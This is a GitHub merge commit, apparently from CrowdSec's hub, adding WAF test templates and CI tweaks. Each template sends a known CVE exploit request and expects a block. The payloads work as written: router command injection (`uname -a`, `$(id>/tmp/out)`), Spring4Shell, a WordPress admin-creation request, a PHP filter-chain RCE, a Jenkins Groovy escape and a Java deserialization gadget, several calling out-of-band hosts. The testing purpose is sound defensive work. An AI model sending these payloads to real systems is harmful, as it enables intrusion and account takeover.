Merge branch 'master' into cve-2021-3129-appsec-transform

crowdsecurity · Jan 19, 2024 · 7d5ae14 · 7d5ae14
2 parents fa4fc9a + 0c82bbd
commit 7d5ae14
Show file tree

Hide file tree

Showing 110 changed files with 5,033 additions and 82 deletions.
diff --git a/.appsec-tests/CVE-2018-10562/CVE-2018-10562.yaml b/.appsec-tests/CVE-2018-10562/CVE-2018-10562.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-10562
+info:
+  name: CVE-2018-10562
+  author: crowdsec
+  severity: info
+  description: CVE-2018-10562 testing
+  tags: appsec-testing
+http:
+  - raw:
+    - |
+      POST /GponForm/diag_Form?images/ HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=127.0.0.1;`echo zMEw;uname -a;echo zMEw`;&ipv=0
+
+    - | # legit request
+      POST /GponForm/diag_Form?images/ HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=www.my-domain.com
+
+    cookie-reuse: true
+    matchers:
+    - type: dsl
+      condition: and
+      dsl:
+        - 'status_code_1 == 403'
+        - 'status_code_2 == 404' # waf will return 200 but NGINX will return 404
diff --git a/.appsec-tests/CVE-2018-10562/config.yaml b/.appsec-tests/CVE-2018-10562/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2018-10562.yaml
+nuclei_template: CVE-2018-10562.yaml
diff --git a/.appsec-tests/CVE-2022-22965/CVE-2022-22965.yaml b/.appsec-tests/CVE-2022-22965/CVE-2022-22965.yaml
@@ -0,0 +1,29 @@
+id: CVE-2022-22965
+info:
+  name: CVE-2022-22965
+  author: crowdsec
+  severity: info
+  description: CVE-2022-22965 testing
+  tags: appsec-testing
+http:
+  - raw:
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded
+
+        class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx
+      - |
+        GET /?class.module.classLoader.resources.context.configFile={{interact_protocol}}://{{interactsh-url}}&class.module.classLoader.resources.context.configFile.content.aaa=xxx HTTP/1.1
+    payloads:
+      interact_protocol:
+        - "http"
+        - https
+
+    cookie-reuse: true
+    matchers:
+    - type: dsl
+      condition: and
+      dsl:
+        - 'status_code_1 == 403'
+        - 'status_code_2 == 403'
+
diff --git a/.appsec-tests/CVE-2022-22965/config.yaml b/.appsec-tests/CVE-2022-22965/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2022-22965.yaml
+nuclei_template: CVE-2022-22965.yaml
diff --git a/.appsec-tests/CVE-2023-1389/CVE-2023-1389.yaml b/.appsec-tests/CVE-2023-1389/CVE-2023-1389.yaml
@@ -0,0 +1,28 @@
+id: CVE-2023-1389
+info:
+  name: CVE-2023-1389
+  author: crowdsec
+  severity: info
+  description: CVE-2023-1389 testing
+  tags: appsec-testing
+http:
+  - raw:
+    - |
+      POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+      operation=write&country=$(id>/tmp/out)
+
+    - |
+      GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>/tmp/out) HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+
+    cookie-reuse: true
+    matchers:
+    - type: dsl
+      condition: and
+      dsl:
+        - 'status_code_1 == 403'
+        - 'status_code_2 == 403'
diff --git a/.appsec-tests/CVE-2023-1389/config.yaml b/.appsec-tests/CVE-2023-1389/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-1389.yaml
+nuclei_template: CVE-2023-1389.yaml
diff --git a/.appsec-tests/CVE-2023-23752/CVE-2023-23752.yaml b/.appsec-tests/CVE-2023-23752/CVE-2023-23752.yaml
@@ -0,0 +1,21 @@
+id: CVE-2023-23752
+info:
+  name: CVE-2023-23752
+  author: crowdsec
+  severity: info
+  description: CVE-2023-23752 testing
+  tags: appsec-testing
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/api/index.php/v1/config/application?public=true'
+      - '{{BaseURL}}/api/v1/config/application?public=true'
+      - '{{BaseURL}}/api/index.php/v1/users?public=true'
+    cookie-reuse: true
+    matchers:
+    - type: dsl
+      condition: and
+      dsl:
+        - 'status_code_1 == 403'
+        - 'status_code_2 == 403'
+        - 'status_code_3 == 403'
diff --git a/.appsec-tests/CVE-2023-23752/config.yaml b/.appsec-tests/CVE-2023-23752/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-23752.yaml
+nuclei_template: CVE-2023-23752.yaml
diff --git a/.appsec-tests/CVE-2023-28121/CVE-2023-28121.yaml b/.appsec-tests/CVE-2023-28121/CVE-2023-28121.yaml
@@ -0,0 +1,30 @@
+id: CVE-2023-28121
+info:
+  name: CVE-2023-28121
+  author: crowdsec
+  severity: info
+  description: CVE-2023-28121 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      POST /wp-json/wp/v2/users HTTP/1.1
+      Host: {{Hostname}}
+      Upgrade-Insecure-Requests: 1
+      Connection: close
+      Content-Type: application/json
+      X-WCPAY-PLATFORM-CHECKOUT-USER: 1
+      
+      {
+      "username":"hacked",
+      "email":"[email protected]",
+      "password":"SuperSecure1337",
+      "roles":["administrator"]
+      }
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2023-28121/config.yaml b/.appsec-tests/CVE-2023-28121/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-28121.yaml
+nuclei_template: CVE-2023-28121.yaml
diff --git a/.appsec-tests/CVE-2023-46805/CVE-2023-46805.yaml b/.appsec-tests/CVE-2023-46805/CVE-2023-46805.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-46805
+info:
+  name: CVE-2023-46805
+  author: crowdsec
+  severity: info
+  description: CVE-2023-46805 testing
+  tags: appsec-testing
+http:
+  - raw:
+    - |
+      GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/json
+
+    cookie-reuse: true
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2023-46805/config.yaml b/.appsec-tests/CVE-2023-46805/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-46805.yaml
+nuclei_template: CVE-2023-46805.yaml
diff --git a/.appsec-tests/CVE-2023-49070/CVE-2023-49070.yaml b/.appsec-tests/CVE-2023-49070/CVE-2023-49070.yaml
@@ -0,0 +1,38 @@
+id: CVE-2023-49070
+info:
+  name: CVE-2023-49070
+  author: crowdsec
+  severity: info
+  description: CVE-2023-49070 testing
+  tags: appsec-testing
+http:
+  - raw:
+      - |
+        POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <?xml version="1.0"?>
+          <methodCall>
+            <methodName>{{randstr}}</methodName>
+            <params>
+              <param>
+              <value>
+                <struct>
+               <member>
+                  <name>test</name>
+                  <value>
+              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}</serializable>
+                  </value>
+                </member>
+              </struct>
+              </value>
+            </param>
+            </params>
+        </methodCall>
+
+    cookie-reuse: true
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2023-49070/config.yaml b/.appsec-tests/CVE-2023-49070/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-49070.yaml
+nuclei_template: CVE-2023-49070.yaml
diff --git a/.appsec-tests/CVE-2023-6553/CVE-2023-6553.yaml b/.appsec-tests/CVE-2023-6553/CVE-2023-6553.yaml
@@ -0,0 +1,21 @@
+id: CVE-2023-6553
+info:
+  name: CVE-2023-6553
+  author: crowdsec
+  severity: info
+  description: CVE-2023-6553 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      GET /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
+      Host: {{Hostname}}
+      Content-Dir: php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2023-6553/config.yaml b/.appsec-tests/CVE-2023-6553/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-6553.yaml
+nuclei_template: CVE-2023-6553.yaml
diff --git a/.appsec-tests/CVE-2023-7028/CVE-2023-7028.yaml b/.appsec-tests/CVE-2023-7028/CVE-2023-7028.yaml
@@ -0,0 +1,24 @@
+id: CVE-2023-7028
+info:
+  name: CVE-2023-7028
+  author: crowdsec
+  severity: info
+  description: CVE-2023-7028 testing
+  tags: appsec-testing
+variables:
+  username: "{{rand_base(10)}}"
+  username2: "{{rand_base(10)}}"
+http:
+  - raw:
+    - |
+      POST /users/password HTTP/1.1
+      Host: {{Hostname}}
+      Content-Type: application/x-www-form-urlencoded
+      
+      authenticity_token={{rand_base(10)}}&user[email][]={{username}}&user[email][]={{username2}}
+
+    cookie-reuse: true
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.appsec-tests/CVE-2023-7028/config.yaml b/.appsec-tests/CVE-2023-7028/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2023-7028.yaml
+nuclei_template: CVE-2023-7028.yaml
diff --git a/.appsec-tests/vpatch-CVE-2019-1003030/config.yaml b/.appsec-tests/vpatch-CVE-2019-1003030/config.yaml
@@ -0,0 +1,3 @@
+appsec-rules:
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2019-1003030.yaml
+nuclei_template: vpatch-CVE-2019-1003030.yaml
diff --git a/.appsec-tests/vpatch-CVE-2019-1003030/vpatch-CVE-2019-1003030.yaml b/.appsec-tests/vpatch-CVE-2019-1003030/vpatch-CVE-2019-1003030.yaml
@@ -0,0 +1,20 @@
+id: vpatch-CVE-2019-1003030
+info:
+  name: vpatch-CVE-2019-1003030
+  author: crowdsec
+  severity: info
+  description: vpatch-CVE-2019-1003030 testing
+  tags: appsec-testing
+http:
+#this is a dummy request, edit the request(s) to match your needs
+  - raw:
+    - |
+      GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20%7B%0A%20%20%20%20%20%20%20public%20x%28%29%7B%0A%20%20%20%20%20%20%22ping%20-c%201%20xx.xx.xx.xx%22.execute%28%29%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D HTTP/1.1
+      Host: {{Hostname}}
+
+    cookie-reuse: true
+#test will fail because we won't match http status 
+    matchers:
+    - type: status
+      status:
+       - 403
diff --git a/.github/workflows/test_appsec_rules.yaml b/.github/workflows/test_appsec_rules.yaml
@@ -19,8 +19,12 @@ on:
       - '.github/workflows/test_appsec_rules.yaml'
       - '.appsec-tests/**'
 
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+
 jobs:
-  run-hub-tests:
+  run-appsec-rules-tests:
     runs-on: ubuntu-20.04
     steps:
     - name: Check out code into the Go module directory

diff --git a/.github/workflows/test_configurations.yaml b/.github/workflows/test_configurations.yaml
@@ -3,33 +3,42 @@ on:
   pull_request:
     branches: [ master ]
     paths:
-      - 'scenarios/**.yaml'
-      - 'parsers/**.yaml'
-      - 'postoverflows/**.yaml'
       - 'collections/**.yaml'
-      - 'scenarios/**.yml'
+      - 'collections/**.yml'
+      - 'contexts/**.yaml'
+      - 'contexts/**.yml'
+      - 'parsers/**.yaml'
       - 'parsers/**.yml'
+      - 'postoverflows/**.yaml'
       - 'postoverflows/**.yml'
-      - 'collections/**.yml'
+      - 'scenarios/**.yaml'
+      - 'scenarios/**.yml'
       - '.github/workflows/**.yaml'
       - '.github/workflows/**.yml'
       - '.tests/**'
       - '!.github/workflows/update_taxonomy.yaml'
   push:
     branches: [ master ]
     paths:
-      - 'scenarios/**.yaml'
-      - 'parsers/**.yaml'
-      - 'postoverflows/**.yaml'
       - 'collections/**.yaml'
-      - 'scenarios/**.yml'
+      - 'collections/**.yml'
+      - 'contexts/**.yaml'
+      - 'contexts/**.yml'
+      - 'parsers/**.yaml'
       - 'parsers/**.yml'
+      - 'postoverflows/**.yaml'
       - 'postoverflows/**.yml'
-      - 'collections/**.yml'
+      - 'scenarios/**.yaml'
+      - 'scenarios/**.yml'
       - '.github/workflows/**.yaml'
       - '.github/workflows/**.yml'
       - '.tests/**'
       - '!.github/workflows/update_taxonomy.yaml'
+
+concurrency:
+  group: ${{ github.workflow }}-${{ github.ref }}
+  cancel-in-progress: true
+
 jobs:
   run-hub-tests:
     runs-on: ubuntu-latest